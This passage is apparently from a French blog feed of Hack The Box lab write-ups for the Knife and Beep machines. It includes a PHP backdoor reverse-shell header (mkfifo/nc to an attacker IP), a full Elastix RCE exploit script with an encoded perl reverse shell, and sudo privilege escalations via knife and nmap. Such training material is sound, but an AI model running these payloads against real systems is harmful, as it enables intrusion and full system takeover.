x86_64<span class="p">;</span> rv:109.0<span class="o">)</span> Gecko/20100101 Firefox/115.0 </span></span><span class="line"><span class="cl">User-Agentt: zerodiumsystem<span class="o">(</span><span class="s1">&#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc 10.10.16.6 1337 &gt;/tmp/f&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/avif,image/webp,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Connection: close </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">--------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Knife<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.6<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.242<span class="o">]</span> <span class="m">60498</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1025<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">james@knife:/$ python3 -c <span class="s2">&#34;import pty;pty.spawn(&#39;/bin/bash&#39;)&#34;</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s2">&#34;import pty;pty.spawn(&#39;/bin/bash&#39;)&#34;</span> </span></span><span class="line"><span class="cl">james@knife:/$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">james@knife:/$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Knife<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">james@knife:/$ whoami </span></span><span class="line"><span class="cl">james </span></span><span class="line"><span class="cl">james@knife:/$ <span class="nb">cd</span> </span></span><span class="line"><span class="cl">james@knife:~$ cat user.txt </span></span><span class="line"><span class="cl">4819.....4e49f </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="knife-binary-exploit">Knife Binary exploit </h3><p>Avec <strong>sudo -l</strong>, on observe que l&rsquo;on peut executer le binaire knife en tant que root. Sur <code>gtfobins</code>, on trouve rapidement une exploit pour faire une élévation de privilège avec ce binaire.</p> <p>Voici le lien exacte de la page : <a class="link" href="https://gtfobins.github.io/gtfobins/knife/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/knife/</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">james@knife:/home$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> james on knife: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User james may run the following commands on knife: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/knife </span></span><span class="line"><span class="cl">james@knife:/home$ sudo knife <span class="nb">exec</span> -E <span class="s1">&#39;exec &#34;/bin/sh&#34;&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cd /root</span> </span></span><span class="line"><span class="cl"><span class="c1"># cat root.txt</span> </span></span><span class="line"><span class="cl">3db8b.....ce60 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/beep-htb/Mon, 20 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/beep-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Beep cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Beep</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.7</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo nmap -sS -sC -sV -An -vvv -T4 10.10.10.7 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 4.3 <span class="o">(</span>protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1024</span> ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 <span class="o">(</span>DSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-dss AAAAB3NzaC1kc3MAAACBAI04jN+Sn7/9f2k+5UteAWn8KKj3FRGuF4LyeDmo/xxuHgSsdCjYuWtNS8m7stqgNH5edUu8vZ0pzF/quX5kphWg/UOz9weGeGyzde5lfb8epRlTQ2kfbP00l+kq9ztuWaXOsZQGcSR9iKE4lLRJhRCLYPaEbuxKnYz4WhAv4yD5AAAAFQDXgQ9BbvoxeDahe/ksAac2ECqflwAAAIEAiGdIue6mgTfdz/HikSp8DB6SkVh4xjpTTZE8L/HOVpTUYtFYKYj9eG0W1WYo+lGg6SveATlp3EE/7Y6BqdtJNm0RfR8kihoqSL0VzKT7myerJWmP2EavMRPjkbXw32fVBdCGjBqMgDl/QSEn2NNDu8OAyQUVBEHrE4xPGI825qgAAACANnqx2XdVmY8agjD7eFLmS+EovCIRz2+iE+5chaljGD/27OgpGcjdZNN+xm85PPFjUKJQuWmwMVTQRdza6TSp9vvQAgFh3bUtTV3dzDCuoR1D2Ybj9p/bMPnyw62jgBPxj5lVd27LTBi8IAH2fZnct7794Y3Ge+5r4Pm8Qbrpy68<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4SXumrUtyO/pcRLwmvnF25NG/ozHsxSVNRmTwEf7AYubgpAo4aUuvhZXg5iymwTcZd6vm46Y+TX39NQV/yT6ilAEtLbrj1PLjJl+UTS8HDIKl6QgIb1b3vuEjbVjDj1LTq0Puzx52Es0/86WJNRVwh4c9vN8MtYteMb/dE2Azk0SQMtpBP+4Lul4kQrNwl/qjg+lQ7XE+NU7Va22dpEjLv/TjHAKImQu2EqPsC99sePp8PP5LdNbda6KHsSrZXnK9hqpxnwattPHT19D94NHVmMHfea9gXN3NCI3NVfDHQsxhqVtR/LiZzpbKHldFU0lfZYH1aTdBfxvMLrVhasZcw<span class="o">==</span> </span></span><span class="line"><span class="cl">25/tcp open smtp syn-ack ttl <span class="m">63</span> Postfix smtpd </span></span><span class="line"><span class="cl"><span class="p">|</span>_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.2.3 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.2.3 <span class="o">(</span>CentOS<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to https://10.10.10.7/ </span></span><span class="line"><span class="cl">110/tcp open pop3 syn-ack ttl <span class="m">63</span> Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 </span></span><span class="line"><span class="cl"><span class="p">|</span>_pop3-capabilities: RESP-CODES TOP APOP LOGIN-DELAY<span class="o">(</span>0<span class="o">)</span> USER PIPELINING IMPLEMENTATION<span class="o">(</span>Cyrus POP3 server v2<span class="o">)</span> STLS AUTH-RESP-CODE UIDL EXPIRE<span class="o">(</span>NEVER<span class="o">)</span> </span></span><span class="line"><span class="cl">111/tcp open rpcbind syn-ack ttl <span class="m">63</span> <span class="m">2</span> <span class="o">(</span>RPC <span class="c1">#100000)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> rpcinfo: </span></span><span class="line"><span class="cl"><span class="p">|</span> program version port/proto service </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100000</span> <span class="m">2</span> 111/tcp rpcbind </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100000</span> <span class="m">2</span> 111/udp rpcbind </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">100024</span> <span class="m">1</span> 790/udp status </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">100024</span> <span class="m">1</span> 793/tcp status </span></span><span class="line"><span class="cl">143/tcp open imap syn-ack ttl <span class="m">63</span> Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 </span></span><span class="line"><span class="cl"><span class="p">|</span>_imap-capabilities: Completed MAILBOX-REFERRALS IMAP4 <span class="nv">RIGHTS</span><span class="o">=</span>kxte QUOTA OK ANNOTATEMORE BINARY <span class="nv">SORT</span><span class="o">=</span>MODSEQ X-NETSCAPE LIST-SUBSCRIBED UIDPLUS LISTEXT IMAP4rev1 CHILDREN STARTTLS IDLE NAMESPACE SORT CONDSTORE ID ACL CATENATE NO RENAME <span class="nv">THREAD</span><span class="o">=</span>REFERENCES LITERAL+ URLAUTHA0001 MULTIAPPEND <span class="nv">THREAD</span><span class="o">=</span>ORDEREDSUBJECT ATOMIC UNSELECT </span></span><span class="line"><span class="cl">443/tcp open ssl/http syn-ack ttl <span class="m">63</span> Apache httpd 2.2.3 <span class="o">((</span>CentOS<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">1</span> disallowed entry </span></span><span class="line"><span class="cl"><span class="p">|</span>_/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 80DCC71362B27C7D0E608B0890C05E9F </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: 2025-01-20T14:02:51+00:00<span class="p">;</span> +7m26s from scanner time. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Elastix - Login page </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.2.3 <span class="o">(</span>CentOS<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>localhost.localdomain/organizationName<span class="o">=</span>SomeOrganization/stateOrProvinceName<span class="o">=</span>SomeState/countryName<span class="o">=</span>--/organizationalUnitName<span class="o">=</span>SomeOrganizationalUnit/localityName<span class="o">=</span>SomeCity/emailAddress<span class="o">=</span>root@localhost.localdomain </span></span><span class="line"><span class="cl"><span class="p">|</span> Issuer: <span class="nv">commonName</span><span class="o">=</span>localhost.localdomain/organizationName<span class="o">=</span>SomeOrganization/stateOrProvinceName<span class="o">=</span>SomeState/countryName<span class="o">=</span>--/organizationalUnitName<span class="o">=</span>SomeOrganizationalUnit/localityName<span class="o">=</span>SomeCity/emailAddress<span class="o">=</span>root@localhost.localdomain </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key type: rsa </span></span><span class="line"><span class="cl"><span class="p">|</span> Public Key bits: <span class="m">1024</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Signature Algorithm: sha1WithRSAEncryption </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2017-04-07T08:22:08 </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid after: 2018-04-07T08:22:08 </span></span><span class="line"><span class="cl"><span class="p">|</span> MD5: 621a:82b6:cf7e:1afa:5284:1c91:60c8:fbc8 </span></span><span class="line"><span class="cl"><span class="p">|</span> SHA-1: 800a:c6e7:065e:1198:0187:c452:0d9b:18ef:e557:a09f </span></span><span class="line"><span class="cl"><span class="p">|</span> -----BEGIN CERTIFICATE----- </span></span><span class="line"><span class="cl"><span class="p">|</span> MIIEDjCCA3egAwIBAgICfVUwDQYJKoZIhvcNAQEFBQAwgbsxCzAJBgNVBAYTAi0t </span></span><span class="line"><span class="cl"><span class="p">|</span> MRIwEAYDVQQIEwlTb21lU3RhdGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQK </span></span><span class="line"><span class="cl"><span class="p">|</span> ExBTb21lT3JnYW5pemF0aW9uMR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uY... </span></span><span class="line"><span class="cl"><span class="p">|</span>_-----END CERTIFICATE----- </span></span><span class="line"><span class="cl">993/tcp open ssl/imap syn-ack ttl <span class="m">63</span> Cyrus imapd </span></span><span class="line"><span class="cl"><span class="p">|</span>_imap-capabilities: CAPABILITY </span></span><span class="line"><span class="cl">995/tcp open pop3 syn-ack ttl <span class="m">63</span> Cyrus pop3d </span></span><span class="line"><span class="cl">3306/tcp open mysql syn-ack ttl <span class="m">63</span> MySQL <span class="o">(</span>unauthorized<span class="o">)</span> </span></span><span class="line"><span class="cl">4445/tcp open upnotifyp? syn-ack ttl <span class="m">63</span> </span></span><span class="line"><span class="cl">10000/tcp open http syn-ack ttl <span class="m">63</span> MiniServ 1.570 <span class="o">(</span>Webmin httpd<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="p">;</span> <span class="nv">Charset</span><span class="o">=</span>iso-8859-1<span class="o">)</span>. </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="elastix---rce">Elastix - RCE </h3><p>On trouve une exploit sur github sur Elastix. Dans le code fournit par searchsploit, l&rsquo;extension utilisé pour faire un call sur le php est &ldquo;1000&rdquo;. Il fallait retrouver que la bonne extension est &ldquo;233&rdquo; pour cette machine. Pour les autres valeurs, le call ne fonctionne pas et renvoie une erreur. Ensuite, on peut exploiter la RCE.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat final_exploit.py </span></span><span class="line"><span class="cl"><span class="c1">#exploit modified by infosecjunky</span> </span></span><span class="line"><span class="cl"><span class="c1">#https://infosecjunky.com</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">import urllib2 </span></span><span class="line"><span class="cl">import ssl </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">rhost</span><span class="o">=</span><span class="s2">&#34;10.10.10.7&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">lhost</span><span class="o">=</span><span class="s2">&#34;10.10.16.2&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">lport</span><span class="o">=</span><span class="m">1337</span> </span></span><span class="line"><span class="cl"><span class="nv">extension</span><span class="o">=</span><span class="s2">&#34;233&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">ctx</span> <span class="o">=</span> ssl.SSLContext<span class="o">(</span>ssl.PROTOCOL_TLSv1<span class="o">)</span> </span></span><span class="line"><span class="cl">ctx.check_hostname <span class="o">=</span> False </span></span><span class="line"><span class="cl">ctx.verify_mode <span class="o">=</span> ssl.CERT_NONE </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Reverse shell payload</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">url</span> <span class="o">=</span> <span class="s1">&#39;https://&#39;</span>+str<span class="o">(</span>rhost<span class="o">)</span>+<span class="s1">&#39;/recordings/misc/callme_page.php?action=c&amp;callmenum=&#39;</span>+str<span class="o">(</span>extension<span class="o">)</span>+<span class="s1">&#39;@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22&#39;</span>+str<span class="o">(</span>lhost<span class="o">)</span>+<span class="s1">&#39;%3a&#39;</span>+str<span class="o">(</span>lport<span class="o">)</span>+<span class="s1">&#39;%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">urllib2.urlopen<span class="o">(</span>url,context<span class="o">=</span>ctx<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># On Elastix, once we have a shell, we can escalate to root:</span> </span></span><span class="line"><span class="cl"><span class="c1"># root@bt:~# nc -lvp 443</span> </span></span><span class="line"><span class="cl"><span class="c1"># listening on [any] 443 ...</span> </span></span><span class="line"><span class="cl"><span class="c1"># connect to [172.16.254.223] from voip [172.16.254.72] 43415</span> </span></span><span class="line"><span class="cl"><span class="c1"># id</span> </span></span><span class="line"><span class="cl"><span class="c1"># uid=100(asterisk) gid=101(asterisk)</span> </span></span><span class="line"><span class="cl"><span class="c1"># sudo nmap --interactive</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )</span> </span></span><span class="line"><span class="cl"><span class="c1"># Welcome to Interactive Mode -- press h &lt;enter&gt; for help</span> </span></span><span class="line"><span class="cl"><span class="c1"># nmap&gt; !sh</span> </span></span><span class="line"><span class="cl"><span class="c1"># id</span> </span></span><span class="line"><span class="cl"><span class="c1"># uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="nmap-as-root">nmap as root </h3><p>Sur : <a class="link" href="https://gtfobins.github.io/gtfobins/nmap/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/nmap/</a></p> <p>On trouve comment exploiter les droits root sur la commande nmap pour obtenir un shell privilégié.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> asterisk on this host: </span></span><span class="line"><span class="cl"> env_reset, <span class="nv">env_keep</span><span class="o">=</span><span class="s2">&#34;COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR </span></span></span><span class="line"><span class="cl"><span class="s2"> LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE </span></span></span><span class="line"><span class="cl"><span class="s2"> LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC </span></span></span><span class="line"><span class="cl"><span class="s2"> LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET </span></span></span><span class="line"><span class="cl"><span class="s2"> XAUTHORITY&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User asterisk may run the following commands on this host: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /sbin/shutdown </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/nmap </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/yum </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /bin/touch </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /bin/chmod </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /bin/chown </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /sbin/service </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /sbin/init </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/sbin/postmap </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/sbin/postfix </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/sbin/saslpasswd2 </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/sbin/hardware_detector </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /sbin/chkconfig </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/sbin/elastix-helper </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sudo /usr/bin/nmap --interactive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Starting Nmap V. 4.11 <span class="o">(</span> http://www.insecure.org/nmap/ <span class="o">)</span> </span></span><span class="line"><span class="cl">Welcome to Interactive Mode -- press h &lt;enter&gt; <span class="k">for</span> <span class="nb">help</span> </span></span><span class="line"><span class="cl">nmap&gt; !sh </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">19d01.....0b5f </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cat /home/*/user.txt </span></span><span class="line"><span class="cl">c3a2.....2248 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/openadmin-htb/Mon, 20 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/openadmin-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="OpenAdmin cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">OpenAdmin</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.171</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> 